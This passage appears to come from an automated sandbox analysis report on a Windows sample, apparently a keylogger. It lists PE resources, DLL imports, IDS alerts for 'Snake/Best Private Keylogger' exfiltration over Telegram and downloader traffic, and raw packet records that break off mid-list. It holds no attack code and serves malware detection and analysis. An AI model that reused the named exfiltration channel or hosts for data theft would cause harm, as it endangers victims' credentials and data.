                                                                                                            RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                            RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                            RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                            RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                            RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                            RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                            RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                            RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                            RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                            RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                            RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                            RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                            RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                            RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                            RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                            RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                            RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                            RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                            RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                            RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-10T21:41:04.978467+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849785142.250.181.238443TCP
                                                                                                            2025-01-10T21:41:09.855799+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849819193.122.6.16880TCP
                                                                                                            2025-01-10T21:41:16.746397+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849819193.122.6.16880TCP
                                                                                                            2025-01-10T21:41:17.415525+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849867149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:17.793698+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849867149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:18.668334+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849875193.122.6.16880TCP
                                                                                                            2025-01-10T21:41:19.224861+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849880149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:19.687049+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849880149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:21.006084+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849891149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:21.485754+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849891149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:22.756876+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849904149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:23.161952+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849904149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:24.655050+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849917149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:24.917668+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849917149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:26.262843+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849929149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:26.614738+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849929149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:27.913903+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849942149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:28.223995+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849942149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:29.890487+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849955149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:30.314610+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849955149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:31.567980+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849965149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:31.879631+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849965149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:33.138548+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849977149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:33.495391+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849977149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:34.875730+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.849989149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:35.188701+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.849989149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:36.530641+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850001149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:36.757896+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850001149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:38.043435+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850006149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:38.364189+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850006149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:39.657095+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850008149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:40.055332+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850008149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:41.352591+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850010149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:41.697330+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850010149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:43.109284+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850012149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:43.436345+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850012149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:44.746178+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850014149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:45.015846+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850014149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:46.294566+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850016149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:47.639350+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850016149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:48.959134+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850018149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:49.349565+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850018149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:50.630293+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850020149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:50.928807+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850020149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:52.194413+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850022149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:52.471215+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850022149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:53.768230+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850024149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:53.992976+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850024149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:55.294687+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850026149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:55.601059+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850026149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:56.863743+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850028149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:57.166640+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850028149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:58.487650+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850030149.154.167.220443TCP
                                                                                                            2025-01-10T21:41:58.844952+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850030149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:00.308605+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850032149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:00.554468+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850032149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:01.891414+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850034149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:02.309175+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850034149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:03.586916+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.850036149.154.167.220443TCP
                                                                                                            2025-01-10T21:42:03.939152+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.850036149.154.167.220443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 21:41:03.770004034 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:03.770046949 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:03.770143986 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:03.783288002 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:03.783322096 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.574706078 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.574775934 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.575809002 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.575910091 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.671637058 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.671659946 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.672015905 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.672080040 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.677010059 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.719342947 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.978503942 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.978563070 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.978578091 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.978605032 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.978629112 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.978653908 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.980153084 CET49785443192.168.2.8142.250.181.238
                                                                                                            Jan 10, 2025 21:41:04.980179071 CET44349785142.250.181.238192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.004508972 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.004559040 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.004646063 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.005023956 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.005043983 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.649202108 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.649321079 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.654588938 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.654596090 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.654905081 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:05.655056953 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.660360098 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:05.707331896 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.229330063 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.229418993 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.235208988 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.235277891 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.247733116 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.247798920 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.247808933 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.247843981 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.253961086 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.254010916 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.315769911 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.315836906 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.315839052 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.315849066 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.315882921 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.315907955 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.318370104 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.318423033 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.318429947 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.318466902 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.324764013 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.325059891 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.325076103 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.325179100 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.331615925 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.331679106 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.331685066 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.331748009 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.347232103 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.347291946 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.347299099 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.347356081 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.373136997 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.373265982 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.373272896 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.373321056 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.379013062 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.379076958 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.379081011 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.379165888 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.385402918 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.385504961 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.385510921 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.385543108 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.392738104 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.392815113 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.392837048 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.392891884 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.395222902 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.395337105 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.395342112 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.395385981 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.396183014 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.396229029 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.396234035 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.396415949 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.397105932 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.397172928 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.397190094 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.397233963 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.397764921 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.397833109 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.402575970 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.402622938 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.402651072 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.402698994 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.402698994 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.402698994 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.402705908 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.402853012 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.402946949 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.403007030 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.404889107 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.405015945 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.407038927 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.407176971 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.430672884 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.430746078 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.430773973 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.430773973 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.430788040 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.430859089 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.438433886 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.438523054 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.438530922 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.438714981 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.439979076 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.440042019 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.440049887 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.440141916 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.442323923 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.442387104 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.442394972 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.442501068 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.443912029 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.443984985 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.443990946 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.444041967 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.444540024 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.444596052 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.444600105 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.444735050 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.444930077 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.445050955 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.445055962 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.445106983 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.445173025 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.445442915 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.459956884 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.460027933 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.460042953 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.460051060 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.460067034 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.460119963 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.465363026 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.465526104 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.465807915 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.466074944 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.472302914 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.472376108 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.472383022 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.472548962 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.479104042 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.479288101 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.479295015 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.479341030 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481553078 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.481609106 CET44349794216.58.206.65192.168.2.8
